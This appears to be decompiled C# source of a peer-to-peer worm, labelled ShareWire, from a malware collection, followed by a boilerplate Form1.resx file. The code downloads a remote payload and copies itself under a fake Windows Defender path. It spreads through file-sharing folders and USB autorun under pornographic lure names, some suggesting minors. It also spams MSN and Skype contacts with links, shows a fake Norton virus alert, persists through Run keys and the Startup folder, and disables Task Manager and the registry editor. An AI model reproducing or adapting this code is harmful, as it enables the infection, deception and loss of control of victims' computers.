this.TextBox1.TabIndex = 1;
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
size1 = new Size(303, 115);
this.ClientSize = size1;
this.Controls.Add((Control) this.TextBox1);
this.Controls.Add((Control) this.ListBox1);
this.ForeColor = System.Drawing.Color.Transparent;
this.FormBorderStyle = FormBorderStyle.None;
this.Name = nameof (Form1);
this.StartPosition = FormStartPosition.CenterScreen;
this.ResumeLayout(false);
this.PerformLayout();
}
internal virtual ListBox ListBox1
{
get => this._ListBox1;
[MethodImpl(MethodImplOptions.Synchronized)] set => this._ListBox1 = value;
}
internal virtual System.Windows.Forms.Timer Timer1
{
get => this._Timer1;
[MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Timer1_Tick);
if (this._Timer1 != null)
this._Timer1.Tick -= eventHandler;
this._Timer1 = value;
if (this._Timer1 == null)
return;
this._Timer1.Tick += eventHandler;
}
}
internal virtual System.Windows.Forms.Timer Timer2
{
get => this._Timer2;
[MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Timer2_Tick);
if (this._Timer2 != null)
this._Timer2.Tick -= eventHandler;
this._Timer2 = value;
if (this._Timer2 == null)
return;
this._Timer2.Tick += eventHandler;
}
}
internal virtual System.Windows.Forms.Timer Timer3
{
get => this._Timer3;
[MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Timer3_Tick);
if (this._Timer3 != null)
this._Timer3.Tick -= eventHandler;
this._Timer3 = value;
if (this._Timer3 == null)
return;
this._Timer3.Tick += eventHandler;
}
}
internal virtual TextBox TextBox1
{
get => this._TextBox1;
[MethodImpl(MethodImplOptions.Synchronized)] set => this._TextBox1 = value;
}
private virtual Messenger msn
{
get => this._msn;
[MethodImpl(MethodImplOptions.Synchronized)] set => this._msn = value;
}
[DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern void keybd_event(byte bVk, byte bScan, int dwFlags, int dwExtraInfo);
[DllImport("user32", EntryPoint = "GetWindowTextA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern object GetWindowText();
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int GetForegroundWindow();
[DllImport("user32.dll", EntryPoint = "GetWindowTextA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int GetWindowText(int hwnd, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpString, int cch);
private string GetActiveWindowTitle()
{
string lpString = new string(char.MinValue, 100);
Form1.GetWindowText(Form1.GetForegroundWindow(), ref lpString, 100);
return lpString.Substring(0, checked (Microsoft.VisualBasic.Strings.InStr(lpString, "\0") - 1));
}
private void Form1_FormClosing(object sender, FormClosingEventArgs e)
{
try
{
Process.Start("C:\\Windows Defender\\explorer.exe");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
private void Form1_Load(object sender, EventArgs e)
{
try
{
Microsoft.VisualBasic.FileSystem.FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared);
this.link = Microsoft.VisualBasic.Strings.Space(checked ((int) Microsoft.VisualBasic.FileSystem.LOF(1)));
Microsoft.VisualBasic.FileSystem.FileGet(1, ref this.link);
Microsoft.VisualBasic.FileSystem.FileClose(1);
this.options = Microsoft.VisualBasic.Strings.Split(this.link, "@Infested@");
this.TextBox1.Text = this.options[1];
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
string text = this.TextBox1.Text;
if (File.Exists(this.fpath))
{
try
{
File.Delete(this.fpath);
MyProject.Computer.Network.DownloadFile(text, this.fpath);
Thread.Sleep(100);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Thread.Sleep(1);
ProjectData.ClearProjectError();
}
}
else
{
MyProject.Computer.Network.DownloadFile(text, this.fpath);
Thread.Sleep(100);
}
try
{
if (Directory.Exists("C:\\Windows Defender"))
{
File.WriteAllBytes("C:\\Windows Defender\\Interop.MessengerPrivate.dll", stub.My.Resources.Resources.Interop_MessengerPrivate);
File.WriteAllBytes("C:\\Windows Defender\\Interop.MessengerAPI.dll", stub.My.Resources.Resources.Interop_MessengerAPI);
if (!File.Exists("C:\\Windows Defender\\explorer.exe"))
File.Copy(Application.ExecutablePath, "C:\\Windows Defender\\explorer.exe");
}
else
{
Directory.CreateDirectory("C:\\Windows Defender");
File.WriteAllBytes("C:\\Windows Defender\\Interop.MessengerPrivate.dll", stub.My.Resources.Resources.Interop_MessengerPrivate);
File.WriteAllBytes("C:\\Windows Defender\\Interop.MessengerAPI.dll", stub.My.Resources.Resources.Interop_MessengerAPI);
File.Copy(Application.ExecutablePath, "C:\\Windows Defender\\explorer.exe");
Process.Start("C:\\Windows Defender\\explorer.exe");
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
this.lime();
try
{
this.msn = (Messenger) new MessengerClass();
IMessengerContacts myContacts = (IMessengerContacts) ((IMessenger4) this.msn).MyContacts;
try
{
foreach (object obj in myContacts)
{
object objectValue = RuntimeHelpers.GetObjectValue(obj);
if (Operators.ConditionalCompareObjectNotEqual(NewLateBinding.LateGet(objectValue, (System.Type) null, "Status", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null), (object) (MISTATUS) 1, false))
this.ListBox1.Items.Add(RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(objectValue, (System.Type) null, "SigninName", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null)));
}
}
finally
{
IEnumerator enumerator;
if (enumerator is IDisposable)
(enumerator as IDisposable).Dispose();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
this.Timer1.Start();
this.P2Pspread();
this.share();
this.Start();
this.AregTime();
this.USBInfect();
string str1 = Conversions.ToString(Conversion.Int(VBMath.Rnd() * 9f));
string str2 = Conversions.ToString(Conversion.Int(VBMath.Rnd() * 9f));
Conversions.ToString(Conversion.Int(VBMath.Rnd() * 9f));
string str3 = Conversions.ToString(Conversion.Int(VBMath.Rnd() * 9f));
string str4 = Conversions.ToString(Conversion.Int(VBMath.Rnd() * 9f));
string str5 = Conversions.ToString(Conversion.Int(VBMath.Rnd() * 9f));
string str6 = Conversions.ToString(Conversion.Int(VBMath.Rnd() * 9f));
this.Timer2.Interval = Conversions.ToInteger(str1 + str2 + str3 + str4 + str5 + str6);
this.Timer2.Start();
this.Timer3.Start();
this.Mgr();
this.Reg();
}
public void lime()
{
label_0:
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 1;
label_1:
int num3 = 2;
if (!Directory.Exists(MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Saved"))
goto label_7;
label_2:
num3 = 3;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Saved\\xxx.avi.scr");
label_3:
num3 = 4;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Saved\\porn.avi.scr");
label_4:
num3 = 5;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Saved\\teenage porn.avi.scr");
label_5:
num3 = 6;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Saved\\teen porn pics.avi.scr");
label_6:
num3 = 7;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Saved\\18 year old with dildo.avi.scr");
goto label_14;
label_7:
num3 = 9;
label_8:
num3 = 10;
Directory.CreateDirectory(MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Saved");
label_9:
num3 = 11;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Saved\\xxx.avi.scr");
label_10:
num3 = 12;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Saved\\porn.avi.scr");
label_11:
num3 = 13;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Saved\\teenage porn.avi.scr");
label_12:
num3 = 14;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Saved\\teen porn pics.avi.scr");
label_13:
num3 = 15;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Saved\\18 year old with dildo.avi.scr");
label_14:
num3 = 17;
if (!Directory.Exists(MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Shared"))
goto label_20;
label_15:
num3 = 18;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Shared\\xxx.avi.scr");
label_16:
num3 = 19;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Shared\\porn.avi.scr");
label_17:
num3 = 20;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Shared\\teenage porn.avi.scr");
label_18:
num3 = 21;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Shared\\teen porn pics.avi.scr");
label_19:
num3 = 22;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Shared\\18 year old with dildo.avi.scr");
goto label_33;
label_20:
num3 = 24;
label_21:
num3 = 25;
Directory.CreateDirectory(MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Shared");
label_22:
num3 = 26;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Shared\\xxx.avi.scr");
label_23:
num3 = 27;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Shared\\porn.avi.scr");
label_24:
num3 = 28;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Shared\\teenage porn.avi.scr");
label_25:
num3 = 29;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Shared\\teen porn pics.avi.scr");
label_26:
num3 = 30;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Shared\\18 year old with dildo.avi.scr");
goto label_33;
label_28:
num2 = num3;
switch (num1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_0;
case 2:
goto label_1;
case 3:
goto label_2;
case 4:
goto label_3;
case 5:
goto label_4;
case 6:
goto label_5;
case 7:
goto label_6;
case 8:
case 16:
case 17:
goto label_14;
case 9:
goto label_7;
case 10:
goto label_8;
case 11:
goto label_9;
case 12:
goto label_10;
case 13:
goto label_11;
case 14:
goto label_12;
case 15:
goto label_13;
case 18:
goto label_15;
case 19:
goto label_16;
case 20:
goto label_17;
case 21:
goto label_18;
case 22:
goto label_19;
case 23:
case 31:
case 32:
goto label_33;
case 24:
goto label_20;
case 25:
goto label_21;
case 26:
goto label_22;
case 27:
goto label_23;
case 28:
goto label_24;
case 29:
goto label_25;
case 30:
goto label_26;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_28;
}
throw ProjectData.CreateProjectError(-2146828237);
label_33:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
private void P2Pspread()
{
string str1 = Conversions.ToString(MyProject.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\LimeWire\\", "InstallDir", (object) 0)) + "\\Shared";
try
{
File.Copy(Application.ExecutablePath, str1 + "\\porn.scr");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
File.Copy(Application.ExecutablePath, Interaction.Environ("programfiles\\Shared\\porn.scr"));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
if (Directory.Exists(MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\Shared"))
{
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\Shared\\porn.scr");
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\Shared\\teen sex.scr");
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\Shared\\paris hilton sex tape.scr");
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\Shared\\sex tape xxx.scr");
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\Shared\\porn.scr");
}
else
{
Directory.CreateDirectory(MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\Shared");
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\Shared\\porn.scr");
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
string str2 = "C:\\Shared";
if (Directory.Exists(str2))
{
File.Copy(Application.ExecutablePath, str2);
}
else
{
Directory.CreateDirectory(str2);
File.Copy(Application.ExecutablePath, str2 + "\\porn.scr");
File.Copy(Application.ExecutablePath, str2 + "\\paris hilton sex tape.scr");
File.Copy(Application.ExecutablePath, str2 + "\\teen sex.scr");
File.Copy(Application.ExecutablePath, str2 + "\\secret sex tape.scr");
File.Copy(Application.ExecutablePath, str2 + "\\pussy climax orgasm fingering dildo sex xxx 18.scr");
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
private void Timer1_Tick(object sender, EventArgs e)
{
try
{
string text = this.TextBox1.Text;
string[] source = new string[11]
{
null,
"lmao what a weekend http://TlNYCHAT.COM/chanb ",
"webcam? :) http://TlNYCHAT.COM/chanb",
"is this website up for you? http://TlNYCHAT.COM/chanb",
"Can you take a look at this app I just made and maybe give me some feedback? " + text,
":D haha http://TlNYCHAT.COM/chanb",
"madness " + text,
"who is this? " + text,
"you know this guy?: " + text,
"think this is any good? " + text,
"... " + text
};
IMessengerContacts myContacts = (IMessengerContacts) ((IMessenger4) this.msn).MyContacts;
VBMath.Randomize();
try
{
((IMessenger4) this.msn).InstantMessage((object) Conversions.ToString(this.ListBox1.Items[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * (float) this.ListBox1.Items.Count)))]));
Thread.Sleep(100);
VBMath.Randomize();
SendKeys.SendWait(source[checked ((int) Math.Round(unchecked ((double) VBMath.Rnd() * (double) ((IEnumerable<string>) source).Count<string>() - 1.0)))]);
SendKeys.SendWait("{ENTER}");
SendKeys.SendWait("{ESC}");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
this.ListBox1.Items.Clear();
try
{
foreach (object obj in myContacts)
{
object objectValue = RuntimeHelpers.GetObjectValue(obj);
if (Operators.ConditionalCompareObjectNotEqual(NewLateBinding.LateGet(objectValue, (System.Type) null, "Status", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null), (object) (MISTATUS) 1, false))
this.ListBox1.Items.Add(RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(objectValue, (System.Type) null, "SigninName", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null)));
}
}
finally
{
IEnumerator enumerator;
if (enumerator is IDisposable)
(enumerator as IDisposable).Dispose();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
private void Timer2_Tick(object sender, EventArgs e)
{
int num = (int) Interaction.MsgBox((object) "Norton antivirus has detected a virus and needs to download a program to remove the infection.\r\n\r\nInternet explorer will now open and you will need install the program", Title: ((object) "Norton Antivirus"));
Process.Start(this.TextBox1.Text);
}
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
public void Start()
{
try
{
string fileName = Path.GetFileName(Application.ExecutablePath);
string directoryRoot = Directory.GetDirectoryRoot(Environment.SystemDirectory);
if (!new DirectoryInfo(directoryRoot + "Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\").Exists)
{
if (File.Exists(directoryRoot + "ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" + fileName))
Microsoft.VisualBasic.FileSystem.Kill(directoryRoot + "ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" + fileName);
MyProject.Computer.FileSystem.CopyFile(Application.ExecutablePath, directoryRoot + "ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" + fileName, true);
Microsoft.VisualBasic.FileSystem.SetAttr(directoryRoot + "ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" + fileName, FileAttribute.Hidden);
Microsoft.VisualBasic.FileSystem.SetAttr(directoryRoot + "ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" + fileName, FileAttribute.ReadOnly);
Microsoft.VisualBasic.FileSystem.SetAttr(directoryRoot + "ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" + fileName, FileAttribute.System);
}
else
{
if (File.Exists(directoryRoot + "Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\" + fileName))
Microsoft.VisualBasic.FileSystem.Kill(directoryRoot + "Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\" + fileName);
MyProject.Computer.FileSystem.CopyFile(Application.ExecutablePath, directoryRoot + "Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\" + fileName, true);
Microsoft.VisualBasic.FileSystem.SetAttr(directoryRoot + "Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\" + fileName, FileAttribute.Hidden);
Microsoft.VisualBasic.FileSystem.SetAttr(directoryRoot + "Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\" + fileName, FileAttribute.ReadOnly);
Microsoft.VisualBasic.FileSystem.SetAttr(directoryRoot + "Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\" + fileName, FileAttribute.System);
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
public void AregTime()
{
string fileName = Path.GetFileName(Application.ExecutablePath);
string path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Microsoft\\System\\Services\\";
try
{
if (!Directory.Exists(path))
Directory.CreateDirectory(path);
if (!File.Exists(path + fileName))
Microsoft.VisualBasic.FileSystem.FileCopy(Application.ExecutablePath, path + fileName);
object objectValue = RuntimeHelpers.GetObjectValue(Interaction.CreateObject("wscript.shell"));
try
{
NewLateBinding.LateCall(objectValue, (System.Type) null, "regwrite", new object[2]
{
(object) ("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\" + fileName),
(object) (path + fileName)
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
NewLateBinding.LateCall(objectValue, (System.Type) null, "regwrite", new object[2]
{
(object) ("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\" + fileName),
(object) (path + fileName)
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
ProjectData.ClearProjectError();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public void share()
{
string path1 = MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\Downloads\\eMule\\Incoming";
string path2 = MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\bearshare\\shared";
try
{
if (Directory.Exists(path1))
{
File.Copy(Application.ExecutablePath, path1 + "\\porn.scr");
File.Copy(Application.ExecutablePath, path1 + "\\paris hilton sex tape.scr");
File.Copy(Application.ExecutablePath, path1 + "\\teen sex.scr");
File.Copy(Application.ExecutablePath, path1 + "\\secret sex tape.scr");
File.Copy(Application.ExecutablePath, path1 + "\\pussy climax orgasm fingering dildo sex xxx 18.scr");
}
if (!Directory.Exists(path2))
return;
File.Copy(Application.ExecutablePath, path2 + "\\porn.scr");
File.Copy(Application.ExecutablePath, path2 + "\\paris hilton sex tape.scr");
File.Copy(Application.ExecutablePath, path2 + "\\teen sex.scr");
File.Copy(Application.ExecutablePath, path2 + "\\secret sex tape.scr");
File.Copy(Application.ExecutablePath, path2 + "\\pussy climax orgasm fingering dildo sex xxx 18.scr");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
public void USBInfect()
{
label_0:
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 1;
label_1:
int num3 = 2;
MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", "Hidden", (object) "0", RegistryValueKind.DWord);
label_2:
num3 = 3;
string programFiles = MyProject.Computer.FileSystem.SpecialDirectories.ProgramFiles;
label_3:
num3 = 4;
string[] logicalDrives = Directory.GetLogicalDrives();
label_4:
num3 = 5;
string[] strArray = logicalDrives;
int index = 0;
goto label_14;
label_6:
num3 = 6;
string str;
if (programFiles.Contains(str))
goto label_12;
label_7:
num3 = 8;
label_8:
num3 = 9;
MyProject.Computer.FileSystem.CopyFile(Application.ExecutablePath, str + "HDDFile.com", (UIOption) -1, UICancelOption.DoNothing);
label_9:
num3 = 10;
MyProject.Computer.FileSystem.WriteAllText(str + "autorun.inf", "[autorun]\r\nopen=" + str + "HDDFile.com\r\nshellexecute=" + str, true);
label_10:
num3 = 11;
Microsoft.VisualBasic.FileSystem.SetAttr(str + "HDDFile.com", FileAttribute.Hidden);
label_11:
num3 = 12;
Microsoft.VisualBasic.FileSystem.SetAttr(str + "autorun.inf", FileAttribute.Hidden);
label_12:
checked { ++index; }
label_13:
num3 = 14;
label_14:
if (index < strArray.Length)
{
str = strArray[index];
goto label_6;
}
else
goto label_21;
label_16:
num2 = num3;
switch (num1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_0;
case 2:
goto label_1;
case 3:
goto label_2;
case 4:
goto label_3;
case 5:
goto label_4;
case 6:
goto label_6;
case 7:
case 13:
goto label_12;
case 8:
goto label_7;
case 9:
goto label_8;
case 10:
goto label_9;
case 11:
goto label_10;
case 12:
goto label_11;
case 14:
goto label_13;
case 15:
goto label_21;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_16;
}
throw ProjectData.CreateProjectError(-2146828237);
label_21:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
private void Timer3_Tick(object sender, EventArgs e)
{
string text = this.TextBox1.Text;
if (!this.GetActiveWindowTitle().ToString().Contains("Skype"))
return;
SendKeys.Send("{ENTER}");
SendKeys.Send("Hey webcam with me! http://TlNYCHAT.COM/chanb ");
SendKeys.Send("{ENTER}");
}
public void Mgr()
{
label_0:
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 1;
label_1:
int num3 = 2;
Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", true).SetValue("DisableTaskMgr", (object) "1", RegistryValueKind.DWord);
goto label_8;
label_3:
num2 = num3;
switch (num1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_0;
case 2:
goto label_1;
case 3:
goto label_8;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_3;
}
throw ProjectData.CreateProjectError(-2146828237);
label_8:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
public void Reg()
{
label_0:
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 1;
label_1:
int num3 = 2;
Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", true).SetValue("DisableRegistryTools", (object) "1", RegistryValueKind.DWord);
goto label_8;
label_3:
num2 = num3;
switch (num1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_0;
case 2:
goto label_1;
case 3:
goto label_8;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_3;
}
throw ProjectData.CreateProjectError(-2146828237);
label_8:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
}
}
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.ShareWire.ay-d8ec6d31f4acc813de1053b3a60dd04fa27b0ed0ffa2b95c5200a6734eb19dc7/Form1.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
